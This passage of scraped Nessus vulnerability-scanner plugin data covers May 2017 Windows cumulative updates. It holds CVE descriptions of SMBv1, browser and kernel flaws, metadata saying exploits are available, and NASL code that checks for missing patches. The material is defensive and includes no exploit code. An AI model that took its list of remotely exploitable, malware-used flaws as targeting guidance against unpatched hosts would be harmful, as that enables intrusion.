Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\n\n - An information disclosure vulnerability exists in the\n GDI component due to improper handling of objects in\n memory. An unauthenticated, remote attacker can exploit\n this, by convincing a user to open a specially crafted\n document or visit a specially crafted website, to\n disclose the contents of memory. (CVE-2017-8552)\");\n # https://support.microsoft.com/en-us/help/4019264/windows-7-update-kb4019264\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?89dd1a9e\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply Security Only update KB4019263 or Cumulative update KB4019264.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_check_rollup.nasl\", \"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit(\"SMB/MS_Bulletin_Checks/Possible\");\n\n## NB: Microsoft\nbulletin = 'MS17-05';\nkbs = make_list(\"4019264\", \"4019263\");\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kbs, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit(\"SMB/WindowsVersion\", exit_code:1);\n\n# KB only applies to Window 7 / 2008 R2, SP1\nif (hotfix_check_sp_range(win7:'1') <= 0)\n audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(as_share:TRUE, exit_on_fail:TRUE);\nif (!is_accessible_share(share:share)) audit(AUDIT_SHARE_FAIL, share);\n\nif (\n # Windows 7 / 2008 R2\n smb_check_rollup(os:\"6.1\", sp:1, rollup_date:\"05_2017\", bulletin:bulletin, rollup_kb_list:[4019264, 4019263])\n)\n{\n replace_kb_item(name:\"SMB/Missing/\"+bulletin, value:TRUE);\n hotfix_security_hole();\n hotfix_check_fversion_end();\n exit(0);\n}\nelse\n{\n hotfix_check_fversion_end();\n audit(AUDIT_HOST_NOT, hotfix_get_audit_report());\n}\n", "cvss": {"score": 9.3, "vector": "AV:N/AC:M/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2022-06-16T16:23:29", "description": "The remote Windows 10 version 1511 host is missing security update KB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet Explorer due to an unspecified flaw. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to bypass mixed content warnings and load insecure content (HTTP) from secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in Windows in the Microsoft DirectX graphics kernel subsystem (dxgkrnl.sys) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the Windows Graphics Device Interface (GDI) due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in Windows Hyper-V due to improper validation of vSMB packet data. An unauthenticated, adjacent attacker can exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the Windows COM Aggregate Marshaler due to an unspecified flaw. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in Windows due to improper validation of user-supplied input when loading type libraries. A local attacker can exploit this, via a specially crafted application, to gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in Microsoft Internet Explorer due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to execute arbitrary code in the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers due to improper rendering of the SmartScreen filter. An unauthenticated, remote attacker can exploit this, via a specially crafted URL, to redirect users to a malicious website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper sandboxing. An unauthenticated, remote attacker can exploit this to break out of the Edge AppContainer sandbox and gain elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Microsoft Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the Chakra JavaScript engine due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in Microsoft browsers in the JavaScript scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in Microsoft Edge in the scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website or to open a specially crafted Office document, to execute arbitrary code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in Microsoft Edge due to improper rendering of a domain-less page in the URL. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a specially crafted website, to cause the user to perform actions in the context of the Intranet Zone and access functionality that is not typically available to the browser when browsing in the context of the Internet Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the win32k component due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to execute arbitrary code with elevated permissions. Note that an attacker can also cause a denial of service condition on Windows 7 x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft .NET Framework and .NET Core components due to a failure to completely validate certificates. An attacker can exploit this to present a certificate that is marked invalid for a specific use, but the component uses it for that purpose, resulting in a bypass of the Enhanced Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the Windows kernel due to improper initialization of objects in memory. A local attacker can exploit this, via a specially crafted application, to disclose sensitive information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the Windows kernel-mode driver due to improper handling of objects in memory. A local attacker can exploit this, via a specially crafted application, to run arbitrary code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the Microsoft scripting engines due to improper handling of objects in memory. An unauthenticated, remote attacker can exploit this, by convincing a user to visit a crafted web page or open a crafted Office document file, to execute arbitrary code in the context of the current user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the Microsoft Server Message Block 1.0 (SMBv1) server when handling certain requests. An unauthenticated, remote attacker can exploit this, via a specially crafted packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft Server Message Block (SMB) when handling a specially crafted request to the server. An unauthenticated, remote attacker can exploit this, via a crafted SMB request, to cause the system to stop responding.\n (CVE-2017-0280)", "cvss3": {"score": 8.1, "vector": "CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H"}, "published": "2017-05-09T00:00:00", "type": "nessus", "title": "KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update", "bulletinFamily": "scanner", "cvss2": {}, "cvelist": ["CVE-2017-0064", "CVE-2017-0077", "CVE-2017-0190", "CVE-2017-0212", "CVE-2017-0213", "CVE-2017-0214", "CVE-2017-0222", "CVE-2017-0226", "CVE-2017-0227", "CVE-2017-0228", "CVE-2017-0229", "CVE-2017-0231", "CVE-2017-0233", "CVE-2017-0234", "CVE-2017-0236", "CVE-2017-0238", "CVE-2017-0240", "CVE-2017-0241", "CVE-2017-0246", "CVE-2017-0248", "CVE-2017-0258", "CVE-2017-0259", "CVE-2017-0263", "CVE-2017-0266", "CVE-2017-0267", "CVE-2017-0268", "CVE-2017-0269", "CVE-2017-0270", "CVE-2017-0271", "CVE-2017-0272", "CVE-2017-0273", "CVE-2017-0274", "CVE-2017-0275", "CVE-2017-0276", "CVE-2017-0277", "CVE-2017-0278", "CVE-2017-0279", "CVE-2017-0280"], "modified": "2022-03-29T00:00:00", "cpe": ["cpe:/o:microsoft:windows"], "id": "SMB_NT_MS17_MAY_4019473.NASL", "href": "https://www.tenable.com/plugins/nessus/100060", "sourceData": "#%NASL_MIN_LEVEL 70300\n#\n# (C) Tenable Network Security, Inc.\n#\n\ninclude('deprecated_nasl_level.inc');\ninclude('compat.inc');\n\nif (description)\n{\n script_id(100060);\n script_version(\"1.15\");\n script_set_attribute(attribute:\"plugin_modification_date\", value:\"2022/03/29\");\n\n script_cve_id(\n \"CVE-2017-0064\",\n \"CVE-2017-0077\",\n \"CVE-2017-0190\",\n \"CVE-2017-0212\",\n \"CVE-2017-0213\",\n \"CVE-2017-0214\",\n \"CVE-2017-0222\",\n \"CVE-2017-0226\",\n \"CVE-2017-0227\",\n \"CVE-2017-0228\",\n \"CVE-2017-0229\",\n \"CVE-2017-0231\",\n \"CVE-2017-0233\",\n \"CVE-2017-0234\",\n \"CVE-2017-0236\",\n \"CVE-2017-0238\",\n \"CVE-2017-0240\",\n \"CVE-2017-0241\",\n \"CVE-2017-0246\",\n \"CVE-2017-0248\",\n \"CVE-2017-0258\",\n \"CVE-2017-0259\",\n \"CVE-2017-0263\",\n \"CVE-2017-0266\",\n \"CVE-2017-0267\",\n \"CVE-2017-0268\",\n \"CVE-2017-0269\",\n \"CVE-2017-0270\",\n \"CVE-2017-0271\",\n \"CVE-2017-0272\",\n \"CVE-2017-0273\",\n \"CVE-2017-0274\",\n \"CVE-2017-0275\",\n \"CVE-2017-0276\",\n \"CVE-2017-0277\",\n \"CVE-2017-0278\",\n \"CVE-2017-0279\",\n \"CVE-2017-0280\"\n );\n script_bugtraq_id(\n 98099,\n 98102,\n 98103,\n 98108,\n 98112,\n 98113,\n 98114,\n 98117,\n 98121,\n 98127,\n 98139,\n 98164,\n 98173,\n 98179,\n 98203,\n 98208,\n 98217,\n 98229,\n 98234,\n 98237,\n 98258,\n 98259,\n 98260,\n 98261,\n 98263,\n 98264,\n 98265,\n 98266,\n 98267,\n 98268,\n 98270,\n 98271,\n 98272,\n 98273,\n 98274,\n 98276,\n 98281,\n 98298\n );\n script_xref(name:\"MSKB\", value:\"4019473\");\n script_xref(name:\"MSFT\", value:\"MS17-4019473\");\n script_xref(name:\"IAVA\", value:\"2017-A-0148\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/10\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/08/25\");\n script_xref(name:\"CISA-KNOWN-EXPLOITED\", value:\"2022/04/18\");\n\n script_name(english:\"KB4019473: Windows 10 Version 1511 May 2017 Cumulative Update\");\n\n script_set_attribute(attribute:\"synopsis\", value:\n\"The remote Windows host is affected by multiple vulnerabilities.\");\n script_set_attribute(attribute:\"description\", value:\n\"The remote Windows 10 version 1511 host is missing security update\nKB4019473. It is, therefore, affected by multiple vulnerabilities :\n\n - A security bypass vulnerability exists in Internet\n Explorer due to an unspecified flaw. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website, to bypass mixed\n content warnings and load insecure content (HTTP) from\n secure locations (HTTPS). (CVE-2017-0064)\n\n - An elevation of privilege vulnerability exists in\n Windows in the Microsoft DirectX graphics kernel\n subsystem (dxgkrnl.sys) due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to execute\n arbitrary code in an elevated context. (CVE-2017-0077)\n\n - An information disclosure vulnerability exists in the\n Windows Graphics Device Interface (GDI) due to improper\n handling of objects in memory. A local attacker can\n exploit this, via a specially crafted application, to\n disclose sensitive information. (CVE-2017-0190)\n\n - An elevation of privilege vulnerability exists in\n Windows Hyper-V due to improper validation of vSMB\n packet data. An unauthenticated, adjacent attacker can\n exploit this to gain elevated privileges.\n (CVE-2017-0212)\n\n - An elevation of privilege vulnerability exists in the\n Windows COM Aggregate Marshaler due to an unspecified\n flaw. A local attacker can exploit this, via a specially\n crafted application, to execute arbitrary code with\n elevated privileges. (CVE-2017-0213)\n\n - An elevation of privilege vulnerability exists in\n Windows due to improper validation of user-supplied\n input when loading type libraries. A local attacker can\n exploit this, via a specially crafted application, to\n gain elevated privileges. (CVE-2017-0214)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0222)\n\n - A remote code execution vulnerability exists in\n Microsoft Internet Explorer due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n specially crafted website, to execute arbitrary code in\n the context of the current user. (CVE-2017-0226)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or open a specially\n crafted Microsoft Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0227)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0228)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript engines due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0229)\n\n - A spoofing vulnerability exists in Microsoft browsers\n due to improper rendering of the SmartScreen filter. An\n unauthenticated, remote attacker can exploit this, via a\n specially crafted URL, to redirect users to a malicious\n website that appears to be a legitimate website.\n (CVE-2017-0231)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper sandboxing. An\n unauthenticated, remote attacker can exploit this to\n break out of the Edge AppContainer sandbox and gain\n elevated privileges. (CVE-2017-0233)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Microsoft Office document,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0234)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the Chakra JavaScript engine due to\n improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0236)\n\n - A remote code execution vulnerability exists in\n Microsoft browsers in the JavaScript scripting engines\n due to improper handling of objects in memory. An\n unauthenticated, remote attacker can exploit this, by\n convincing a user to visit a specially crafted website\n or open a specially crafted Office document, to\n execute arbitrary code in the context of the current\n user. (CVE-2017-0238)\n\n - A remote code execution vulnerability exists in\n Microsoft Edge in the scripting engines due to improper\n handling of objects in memory. An unauthenticated,\n remote attacker can exploit this, by convincing a user\n to visit a specially crafted website or to open a\n specially crafted Office document, to execute arbitrary\n code in the context of the current user. (CVE-2017-0240)\n\n - An elevation of privilege vulnerability exists in\n Microsoft Edge due to improper rendering of a\n domain-less page in the URL. An unauthenticated, remote\n attacker can exploit this, by convincing a user to visit\n a specially crafted website, to cause the user to\n perform actions in the context of the Intranet Zone and\n access functionality that is not typically available to\n the browser when browsing in the context of the Internet\n Zone. (CVE-2017-0241)\n\n - An elevation of privilege vulnerability exists in the\n win32k component due to improper handling of objects in\n memory. A local attacker can exploit this, via a\n specially crafted application, to execute arbitrary code\n with elevated permissions. Note that an attacker can\n also cause a denial of service condition on Windows 7\n x64 or later systems. (CVE-2017-0246)\n\n - A security bypass vulnerability exists in the Microsoft\n .NET Framework and .NET Core components due to a failure\n to completely validate certificates. An attacker can\n exploit this to present a certificate that is marked\n invalid for a specific use, but the component uses it\n for that purpose, resulting in a bypass of the Enhanced\n Key Usage taggings. (CVE-2017-0248)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0258)\n\n - An information disclosure vulnerability exists in the\n Windows kernel due to improper initialization of objects\n in memory. A local attacker can exploit this, via a\n specially crafted application, to disclose sensitive\n information. (CVE-2017-0259)\n\n - An elevation of privilege vulnerability exists in the\n Windows kernel-mode driver due to improper handling of\n objects in memory. A local attacker can exploit this,\n via a specially crafted application, to run arbitrary\n code in kernel mode. (CVE-2017-0263)\n\n - A remote code execution vulnerability exists in the\n Microsoft scripting engines due to improper handling of\n objects in memory. An unauthenticated, remote attacker\n can exploit this, by convincing a user to visit a\n crafted web page or open a crafted Office document file,\n to execute arbitrary code in the context of the current\n user. (CVE-2017-0266)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0267)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0268)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0269)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0270)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0271)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0272)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0273)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0274)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0275)\n\n - An information disclosure vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to disclose sensitive information.\n (CVE-2017-0276)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0277)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0278)\n\n - A remote code execution vulnerability exists in the\n Microsoft Server Message Block 1.0 (SMBv1) server when\n handling certain requests. An unauthenticated, remote\n attacker can exploit this, via a specially crafted\n packet, to execute arbitrary code on a target server.\n (CVE-2017-0279)\n\n - A denial of service vulnerability exists in Microsoft\n Server Message Block (SMB) when handling a specially\n crafted request to the server. An unauthenticated,\n remote attacker can exploit this, via a crafted SMB\n request, to cause the system to stop responding.\n (CVE-2017-0280)\");\n # https://support.microsoft.com/en-us/help/4019473/windows-10-update-kb4019473\n script_set_attribute(attribute:\"see_also\", value:\"http://www.nessus.org/u?4763dd01\");\n script_set_attribute(attribute:\"solution\", value:\n\"Apply security update KB4019473.\");\n script_set_cvss_base_vector(\"CVSS2#AV:N/AC:M/Au:N/C:C/I:C/A:C\");\n script_set_cvss_temporal_vector(\"CVSS2#E:H/RL:OF/RC:C\");\n script_set_cvss3_base_vector(\"CVSS:3.0/AV:N/AC:H/PR:N/UI:N/S:U/C:H/I:H/A:H\");\n script_set_cvss3_temporal_vector(\"CVSS:3.0/E:H/RL:O/RC:C\");\n script_set_attribute(attribute:\"cvss_score_source\", value:\"CVE-2017-0272\");\n\n script_set_attribute(attribute:\"exploitability_ease\", value:\"Exploits are available\");\n script_set_attribute(attribute:\"exploit_available\", value:\"true\");\n script_set_attribute(attribute:\"exploit_framework_core\", value:\"true\");\n script_set_attribute(attribute:\"exploited_by_malware\", value:\"true\");\n\n script_set_attribute(attribute:\"vuln_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"patch_publication_date\", value:\"2017/05/09\");\n script_set_attribute(attribute:\"plugin_publication_date\", value:\"2017/05/09\");\n\n script_set_attribute(attribute:\"plugin_type\", value:\"local\");\n script_set_attribute(attribute:\"cpe\", value:\"cpe:/o:microsoft:windows\");\n script_set_attribute(attribute:\"stig_severity\", value:\"I\");\n script_end_attributes();\n\n script_category(ACT_GATHER_INFO);\n script_family(english:\"Windows : Microsoft Bulletins\");\n\n script_copyright(english:\"This script is Copyright (C) 2017-2022 and is owned by Tenable, Inc. or an Affiliate thereof.\");\n\n script_dependencies(\"smb_hotfixes.nasl\", \"ms_bulletin_checks_possible.nasl\", \"smb_check_rollup.nasl\");\n script_require_keys(\"SMB/MS_Bulletin_Checks/Possible\");\n script_require_ports(139, 445, \"Host/patch_management_checks\");\n\n exit(0);\n}\n\ninclude(\"audit.inc\");\ninclude(\"smb_hotfixes_fcheck.inc\");\ninclude(\"smb_hotfixes.inc\");\ninclude(\"smb_func.inc\");\ninclude(\"smb_reg_query.inc\");\ninclude(\"misc_func.inc\");\n\nget_kb_item_or_exit('SMB/MS_Bulletin_Checks/Possible');\n\nbulletin = 'MS17-05';\nkb = make_list(\n '4019473' # 10 1151\n);\n\nif (get_kb_item('Host/patch_management_checks')) hotfix_check_3rd_party(bulletin:bulletin, kbs:kb, severity:SECURITY_HOLE);\n\nget_kb_item_or_exit(\"SMB/Registry/Enumerated\");\nget_kb_item_or_exit('SMB/WindowsVersion', exit_code:1);\n\nif (hotfix_check_sp_range(win10:'0') <= 0) audit(AUDIT_OS_SP_NOT_VULN);\n\nshare = hotfix_get_systemdrive(exit_on_fail:TRUE, 